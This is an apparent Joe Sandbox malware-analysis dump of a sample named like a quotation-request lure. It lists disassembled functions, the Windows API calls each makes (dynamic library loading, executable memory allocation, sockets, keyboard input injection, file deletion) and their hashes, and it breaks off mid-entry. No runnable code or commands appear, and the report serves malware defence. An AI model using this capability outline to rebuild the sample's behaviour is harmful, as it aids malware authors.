                                              • API String ID: 2574300362-3689287502
                                              • Opcode ID: 350299455038407b677d5dbb5a838002e8455ecc3100c9e646fcafcd19afacc6
                                              • Instruction ID: 84f140b8b8855d0da4bdd6bd5dd706f9d72bf67c5f268494cb97151bc4bea518
                                              • Opcode Fuzzy Hash: 350299455038407b677d5dbb5a838002e8455ecc3100c9e646fcafcd19afacc6
                                              • Instruction Fuzzy Hash: A4D05E30514753CFDB209F32EC0865676E8BF1A392B15C83EE886E6A90E7B0D8C0CA50
                                              Function 000E4D94 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,000E4CE1,?), ref: 000E4DA2
                                              • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 000E4DB4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: AddressLibraryLoadProc
                                              • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                              • API String ID: 2574300362-1355242751
                                              • Opcode ID: 99c2f2bcd52a222f0e993826de9779f105eab193365f8175d3ca02af49323a7d
                                              • Instruction ID: 24bf06315718e61c88c582c46a7b3ce97ea09d12e8f13e8218d6fac77da13538
                                              • Opcode Fuzzy Hash: 99c2f2bcd52a222f0e993826de9779f105eab193365f8175d3ca02af49323a7d
                                              • Instruction Fuzzy Hash: 71D01731554713CFDB209F32EC08B8676E4EF06395B16883EE8C6E6590E7B0D8C0CA50
                                              Function 00161072 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                              • LoadLibraryA.KERNEL32(advapi32.dll,?,001612C1), ref: 00161080
                                              • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00161092
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: AddressLibraryLoadProc
                                              • String ID: RegDeleteKeyExW$advapi32.dll
                                              • API String ID: 2574300362-4033151799
                                              • Opcode ID: ee1e8082dcf606921c1cf78f814edf38d5ba042daf54017c0a0321de39687b5c
                                              • Instruction ID: 813a8a3ba309b54843797e281be6d1628498cf604ab1135c679633db7a7e5d95
                                              • Opcode Fuzzy Hash: ee1e8082dcf606921c1cf78f814edf38d5ba042daf54017c0a0321de39687b5c
                                              • Instruction Fuzzy Hash: 43D01730510712DFDB209F35ED58A1A76E5EF067A1B15DC3EE88ADA550E7B0D8C0CA50
                                              Function 001593F5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                              • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00159009,?,0016F910), ref: 00159403
                                              • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00159415
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: AddressLibraryLoadProc
                                              • String ID: GetModuleHandleExW$kernel32.dll
                                              • API String ID: 2574300362-199464113
                                              • Opcode ID: c9416c0f270f436e2fa7e16d768828570e8aca425c08516faec20288a67ce645
                                              • Instruction ID: 51980fa7ff5eca0de2cf8b12e59fd440457ccbd79f8136ce69f65c18268db85c
                                              • Opcode Fuzzy Hash: c9416c0f270f436e2fa7e16d768828570e8aca425c08516faec20288a67ce645
                                              • Instruction Fuzzy Hash: 1BD01774614713CFDB209F31EE0860676E5AF06392B11C83EE896DA950E7B0C8C9DA51
                                              Function 001376C5 Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cab4d43dbb1def2ee3ffa5f8640dd9c07de26a641b070bd30d4129374d44f7ca
                                              • Instruction ID: b64dc7e2ca16bd6b1eab431a6f9a7ac30a4a242af259c745abe6537d2ff944de
                                              • Opcode Fuzzy Hash: cab4d43dbb1def2ee3ffa5f8640dd9c07de26a641b070bd30d4129374d44f7ca
                                              • Instruction Fuzzy Hash: 6AC15DB5A04216EFDB24CF94C888EAEB7B5FF48714F158598E805EB291D730ED81DB90
                                              Function 0015E33E Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CharLowerBuffW.USER32(?,?), ref: 0015E3D2
                                              • CharLowerBuffW.USER32(?,?), ref: 0015E415
                                                • Part of subcall function 0015DAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0015DAD9
                                              • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0015E615
                                              • _memmove.LIBCMT ref: 0015E628
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: BuffCharLower$AllocVirtual_memmove
                                              • String ID:
                                              • API String ID: 3659485706-0
                                              • Opcode ID: 291d2b5c4a02d83f208fc18a2a22d3e19e1581131435bb129a109ac1963657ce
                                              • Instruction ID: 4ece982f030d7ea556f18d25f0a0bcbe80900d1d0e604848f8c10acfa1e59d4e
                                              • Opcode Fuzzy Hash: 291d2b5c4a02d83f208fc18a2a22d3e19e1581131435bb129a109ac1963657ce
                                              • Instruction Fuzzy Hash: 87C14B71A08351DFC718DF28C48095ABBE4FF88714F14896DF8A99B351D771EA49CB82
                                              Function 001583A8 Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                                              Download Yara Rule
                                              APIs
                                              • CoInitialize.OLE32(00000000), ref: 001583D8
                                              • CoUninitialize.OLE32 ref: 001583E3
                                                • Part of subcall function 0013DA5D: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0013DAC5
                                              • VariantInit.OLEAUT32(?), ref: 001583EE
                                              • VariantClear.OLEAUT32(?), ref: 001586BF
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                              • String ID:
                                              • API String ID: 780911581-0
                                              • Opcode ID: f9db9450390d5e0a819559af3f6d698b128a23fb3df0377d0f155017a8555da1
                                              • Instruction ID: 99b8af78643aa901c7552bf1bfca555f632e0d81c722c79577dc23e7c7ca3ff4
                                              • Opcode Fuzzy Hash: f9db9450390d5e0a819559af3f6d698b128a23fb3df0377d0f155017a8555da1
                                              • Instruction Fuzzy Hash: 88A12675204741DFCB10EF19C881A6AB7E4BF88315F15445CF9AAAB3A2DB30ED44CB82
                                              Function 00137A78 Relevance: 6.2, APIs: 4, Instructions: 231COMMON
                                              Download Yara Rule
                                              APIs
                                              • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00172C7C,?), ref: 00137C32
                                              • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00172C7C,?), ref: 00137C4A
                                              • CLSIDFromProgID.OLE32(?,?,00000000,0016FB80,000000FF,?,00000000,00000800,00000000,?,00172C7C,?), ref: 00137C6F
                                              • _memcmp.LIBCMT ref: 00137C90
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: FromProg$FreeTask_memcmp
                                              • String ID:
                                              • API String ID: 314563124-0
                                              • Opcode ID: 033562c24d1d63f5b78b28a20dde9b7a2dab4a71df615f882b662295575e01d8
                                              • Instruction ID: deda909f73ae69ab56ee9af669070abbd0e0b1924836963a763c37140a4ec6d8
                                              • Opcode Fuzzy Hash: 033562c24d1d63f5b78b28a20dde9b7a2dab4a71df615f882b662295575e01d8
                                              • Instruction Fuzzy Hash: 14811C71A00109EFCB14DF94C984EEEB7B9FF89315F244598F515AB290DB71AE06CB60
                                              Function 00136DF3 Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Variant$AllocClearCopyInitString
                                              • String ID:
                                              • API String ID: 2808897238-0
                                              • Opcode ID: 5eea4b1ddb78a56bd46dc0655a6293f7783ebe9f933a3f2125642fa44660d90d
                                              • Instruction ID: 69b31970b0055e3b90dd22c0c4d0018cbd1b686b174dd93d6e37ab778b66c519
                                              • Opcode Fuzzy Hash: 5eea4b1ddb78a56bd46dc0655a6293f7783ebe9f933a3f2125642fa44660d90d
                                              • Instruction Fuzzy Hash: 8D51E974608302AFDB38AF65E895A7EB3E8AF59310F20C81FF556DB6D1DB7098409B01
                                              Function 00156CBD Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • socket.WSOCK32(00000002,00000002,00000011), ref: 00156CE4
                                              • WSAGetLastError.WSOCK32(00000000), ref: 00156CF4
                                                • Part of subcall function 000E9997: __itow.LIBCMT ref: 000E99C2
                                                • Part of subcall function 000E9997: __swprintf.LIBCMT ref: 000E9A0C
                                              • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00156D58
                                              • WSAGetLastError.WSOCK32(00000000), ref: 00156D64
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: ErrorLast$__itow__swprintfsocket
                                              • String ID:
                                              • API String ID: 2214342067-0
                                              • Opcode ID: 1e83104817c168fa7171ef6997819d858c845d88b8882440052f2417d48b9ea8
                                              • Instruction ID: 8fd05e2a111fa568292bc650087868e11716990a92d6546a27d156a0cbf03573
                                              • Opcode Fuzzy Hash: 1e83104817c168fa7171ef6997819d858c845d88b8882440052f2417d48b9ea8
                                              • Instruction Fuzzy Hash: 6141AE75740200AFEB24AF25DC86F7A77A9AF44B10F44845CFA59AF2D3DBB09C018B91
                                              Function 0015672D Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                                              Download Yara Rule
                                              APIs
                                              • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0016F910), ref: 001567BA
                                              • _strlen.LIBCMT ref: 001567EC
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: _strlen
                                              • String ID:
                                              • API String ID: 4218353326-0
                                              • Opcode ID: d96a984c0d31562fcc5e15c1ee251dfecb5999e0f607a77290257610dbb3d6f9
                                              • Instruction ID: 31e71ed343610298abd95e87a78115402c2f05f8e5d511e041b065ccd3dcf9ba
                                              • Opcode Fuzzy Hash: d96a984c0d31562fcc5e15c1ee251dfecb5999e0f607a77290257610dbb3d6f9
                                              • Instruction Fuzzy Hash: 3741B331A00204EFCB14EB65DCC1FEEB7A9AF58315F548169F825AB292DB70AD48C790
                                              Function 0014BA5F Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0014BB09
                                              • GetLastError.KERNEL32(?,00000000), ref: 0014BB2F
                                              • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0014BB54
                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0014BB80
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: CreateHardLink$DeleteErrorFileLast
                                              • String ID:
                                              • API String ID: 3321077145-0
                                              • Opcode ID: 8968a6cb44f60105593bd93b4501296f6efaefaf865ea83ceed099c47097ff51
                                              • Instruction ID: 4449c9d94aec83bf582be939cba56770889d75368b85b126bdb54b0de664719a
                                              • Opcode Fuzzy Hash: 8968a6cb44f60105593bd93b4501296f6efaefaf865ea83ceed099c47097ff51
                                              • Instruction Fuzzy Hash: 7C410A39600650DFCB11EF19C585A5DBBE1EF89310B198498EC4AAB772CB74FD41CB91
                                              Function 0016ADF1 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • ClientToScreen.USER32(?,?), ref: 0016AE1A
                                              • GetWindowRect.USER32(?,?), ref: 0016AE90
                                              • PtInRect.USER32(?,?,0016C304), ref: 0016AEA0
                                              • MessageBeep.USER32(00000000), ref: 0016AF11
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Rect$BeepClientMessageScreenWindow
                                              • String ID:
                                              • API String ID: 1352109105-0
                                              • Opcode ID: f180006836d23ac06cae0c7280b830c2a637fbc699e0d43793d3f99360bc8787
                                              • Instruction ID: b19a28d44cb23bfae8420790d68d0eea15ad6279ef163ab952da685b9723d635
                                              • Opcode Fuzzy Hash: f180006836d23ac06cae0c7280b830c2a637fbc699e0d43793d3f99360bc8787
                                              • Instruction Fuzzy Hash: 7941AB71600209DFCB11DF58DC84AA9BBF5FF49300F9880A9E814AB261D732A852CF92
                                              Function 00140FE6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00141037
                                              • SetKeyboardState.USER32(00000080,?,00000001), ref: 00141053
                                              • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 001410B9
                                              • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 0014110B
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: KeyboardState$InputMessagePostSend
                                              • String ID:
                                              • API String ID: 432972143-0
                                              • Opcode ID: 1943bec68260a9d38a58ed5e10719509dbed1821cc9c078ea3e31dc9ada5ae7d
                                              • Instruction ID: 083d754dfd3d402e87acf15a4778f4e27f23129e9d0420f9cd6f0234e3cb42e4
                                              • Opcode Fuzzy Hash: 1943bec68260a9d38a58ed5e10719509dbed1821cc9c078ea3e31dc9ada5ae7d
                                              • Instruction Fuzzy Hash: A3314630E40688BEFF358B6A8C05BFABBA9AB58310F08431AF591531F1C3748DC19751
                                              Function 00141121 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetKeyboardState.USER32(?,753DC0D0,?,00008000), ref: 00141176
                                              • SetKeyboardState.USER32(00000080,?,00008000), ref: 00141192
                                              • PostMessageW.USER32(00000000,00000101,00000000), ref: 001411F1
                                              • SendInput.USER32(00000001,?,0000001C,753DC0D0,?,00008000), ref: 00141243
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: KeyboardState$InputMessagePostSend
                                              • String ID:
                                              • API String ID: 432972143-0
                                              • Opcode ID: ae1985f189d1c429f22b6da37642a712e5392af0101ca30bbdb68cfa6a9ea93e
                                              • Instruction ID: 2c1bbb106b843c584c816f120ab8018cb989a499b918af70a186d2da0ae6d437
                                              • Opcode Fuzzy Hash: ae1985f189d1c429f22b6da37642a712e5392af0101ca30bbdb68cfa6a9ea93e
                                              • Instruction Fuzzy Hash: 13314630A403187AEF258B75CC18BFABBBAAB59720F18431EE681925F1C3748EC58751
                                              Function 00116415 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0011644B
                                              • __isleadbyte_l.LIBCMT ref: 00116479
                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 001164A7
                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 001164DD
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                              • String ID:
                                              • API String ID: 3058430110-0
                                              • Opcode ID: 8ecfd7ee4c6a6772859f2aa164bd1e6feab4c260b7a6e1397984fda655d6fbde
                                              • Instruction ID: 4a9fe33187c65093922ca4b9c3bba523fd7a0ffb17566f0693a9ce1e87c14595
                                              • Opcode Fuzzy Hash: 8ecfd7ee4c6a6772859f2aa164bd1e6feab4c260b7a6e1397984fda655d6fbde
                                              • Instruction Fuzzy Hash: 7731DE31604256AFDB298F69CC44BFA7BA9FF41310F154079E864879A0EB32D890DB90
                                              Function 00165175 Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetForegroundWindow.USER32 ref: 00165189
                                                • Part of subcall function 0014387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00143897
                                                • Part of subcall function 0014387D: GetCurrentThreadId.KERNEL32 ref: 0014389E
                                                • Part of subcall function 0014387D: AttachThreadInput.USER32(00000000,?,001452A7), ref: 001438A5
                                              • GetCaretPos.USER32(?), ref: 0016519A
                                              • ClientToScreen.USER32(00000000,?), ref: 001651D5
                                              • GetForegroundWindow.USER32 ref: 001651DB
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                              • String ID:
                                              • API String ID: 2759813231-0
                                              • Opcode ID: f2cdd3ae61dfd812979fcd98077bc322744aadb6d172a35d0006912cfd8a4fcf
                                              • Instruction ID: bd1fca785166491f320031db1fd8e3c3aed92e0cb033420c783ce6938325e0f6
                                              • Opcode Fuzzy Hash: f2cdd3ae61dfd812979fcd98077bc322744aadb6d172a35d0006912cfd8a4fcf
